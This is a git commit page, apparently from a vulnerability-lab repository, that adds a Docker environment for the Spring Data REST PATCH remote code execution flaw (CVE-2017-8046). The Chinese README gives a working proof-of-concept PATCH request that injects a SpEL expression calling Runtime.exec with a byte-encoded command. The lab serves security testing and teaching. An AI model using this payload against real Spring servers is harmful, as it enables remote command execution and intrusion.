admin/VulApps
1
0
Fork 0
mirror of https://github.com/Medicean/VulApps.git synced 2025-06-20 18:00:18 +00:00
Code Issues Packages Projects Releases Wiki Activity

(Add Vul: Spring) Spring Data REST PATCH请求代码执行漏洞(CVE-2017-8046)

Browse Source
This commit is contained in:
Medicean 2017-09-29 03:18:17 +08:00
parent 7e2ec8bb13
commit 21b9b4e30d
10 changed files with 93 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
README.md
View File

@ -114,6 +114,7 @@ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-037
* [Samba](./s/samba/)
* [Shiro](./s/shiro/)
* [SSH](./s/ssh/)
* [Spring](./s/spring/)
* [Spring Boot](./s/springboot/)
* [Struts2](./s/struts2/)
* [Spring WebFlow](./s/springwebflow/)

1
s/README.md
View File

@ -3,6 +3,7 @@
* [Samba](./samba/)
* [Shiro](./shiro/)
* [SSH](./ssh/)
* [Spring](./spring/)
* [Spring Boot](./springboot/)
* [Struts2](./struts2/)
* [Spring WebFlow](./springwebflow/)

15
s/spring/1/Dockerfile Normal file
View File

@ -0,0 +1,15 @@
FROM openjdk:8-jdk
MAINTAINER Medici.Yan@Gmail.com
ENV JAR_URL http://vulapps.poetn.cc/s/spring/spring-data-rest/spring-data-rest-cve-2017-8046.jar
COPY src/start.sh /start.sh
RUN set -x \
&& chmod a+x /start.sh \
&& mkdir /htdocs \
&& wget -qO /htdocs/ROOT.jar $JAR_URL
EXPOSE 8080
CMD ["/start.sh"]

68
s/spring/1/README.md Normal file
View File

@ -0,0 +1,68 @@
## Spring Data REST PATCH请求代码执行漏洞(CVE-2017-8046)
### 漏洞信息
* [CVE-2017-8046: RCE in PATCH requests in Spring Data REST](https://pivotal.io/security/cve-2017-8046)
* [这个Spring高危漏洞你修补了吗-- 其河@美团点评技术团队](https://mp.weixin.qq.com/s/uTiWDsPKEjTkN6z9QNLtSA)
### 获取环境:
1. 拉取镜像到本地
```
$ docker pull medicean/vulapps:s_spring_1
```
2. 启动环境
```
$ docker run -d -p 8080:8080 medicean/vulapps:s_spring_1
```
> `-p 8080:8080` 前面的 8080 代表物理机的端口,可随意指定。
### 使用与利用
访问 `http://你的 IP 地址:端口号/`, 假设启动的端口号为 8080
#### PoC
1. 访问 `http://127.0.0.1:8080/`,测试服务是否启动成功
> 第一次启动时会下载 mongodb网速慢的可能要多等一会儿
![](https://github.com/Medicean/VulApps/raw/master/s/spring/1/poc-1.png)
2. 利用 POST 请求添加一个数据
```
POST /persons HTTP/1.1
Host: 127.0.0.1:8080
Content-Type: application/json
Cache-Control: no-cache
{"firstName": "VulApps", "lastName": "VulApps"}
```
![](https://github.com/Medicean/VulApps/raw/master/s/spring/1/poc-2.png)
3. 执行 PoC
执行命令为: `/usr/bin/touch /tmp/vuln`,注意 Content-Type 值为 `application/json-patch+json`
```
PATCH /persons/1 HTTP/1.1
Host: 127.0.0.1:8080
Content-Type: application/json-patch+json
Cache-Control: no-cache
Content-Length: 228
[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{47,117,115,114,47,98,105,110,47,116,111,117,99,104,32,47,116,109,112,47,118,117,108,110}))/lastName", "value": "vulapps-demo" }]
```
![](https://github.com/Medicean/VulApps/raw/master/s/spring/1/poc-3.png)
4. 进入容器,发现成功创建文件
![](https://github.com/Medicean/VulApps/raw/master/s/spring/1/poc-4.png)
### 参考链接
* [这个Spring高危漏洞你修补了吗-- 其河@美团点评技术团队](https://mp.weixin.qq.com/s/uTiWDsPKEjTkN6z9QNLtSA)

BIN
s/spring/1/poc-1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 59 KiB

BIN
s/spring/1/poc-2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 160 KiB

BIN
s/spring/1/poc-3.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 110 KiB

BIN
s/spring/1/poc-4.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 302 KiB

5
s/spring/1/src/start.sh Normal file
View File

@ -0,0 +1,5 @@
#!/bin/bash
while [[ true ]]; do
java -jar /htdocs/ROOT.jar
sleep 5
done

3
s/spring/README.md Normal file
View File

@ -0,0 +1,3 @@
# Spring
* [Spring Data REST PATCH请求代码执行漏洞(CVE-2017-8046)](./1/)